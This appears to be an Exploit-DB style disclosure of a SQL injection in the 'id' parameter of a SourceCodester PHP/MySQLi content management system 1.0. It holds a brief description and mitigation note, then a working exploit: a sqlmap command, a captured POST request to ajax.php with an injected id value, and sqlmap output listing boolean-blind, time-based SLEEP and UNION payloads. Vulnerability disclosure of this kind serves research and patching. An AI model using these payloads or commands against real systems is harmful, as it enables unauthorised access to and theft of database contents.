Content Management System 1.0 - 'id' SQL Injection

vendor:

Content Management System using PHP/MySQLi

by:

Zhayi (Zeo)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Content Management System using PHP/MySQLi

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:content_management_system_using_phpmysqli

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WINDOWS 10

2020

Content Management System 1.0 – ‘id’ SQL Injection

Content Management System 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted request to the application. By exploiting this vulnerability, an attacker can gain access to the database and disclose all the contents of the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: WINDOWS 10

Step 1. Capture the request of the "
http://127.0.0.1/ajax.php?action=load_list" page in burpsute
Step 2. Save POST the packet
Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
--dbs "
Step 4. This will inject successfully and you will have an information
disclosure of all databases contents

POST the packet
---
POST /ajax.php?action=load_list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
Firefox/78.0
Content-Length: 63
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
Origin: http://127.0.0.1
Referer:
http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
---

SQLMAP
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689
AND 'ZPQO'='ZPQO&start=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT
6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL
SELECT
NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--
-&start=0
---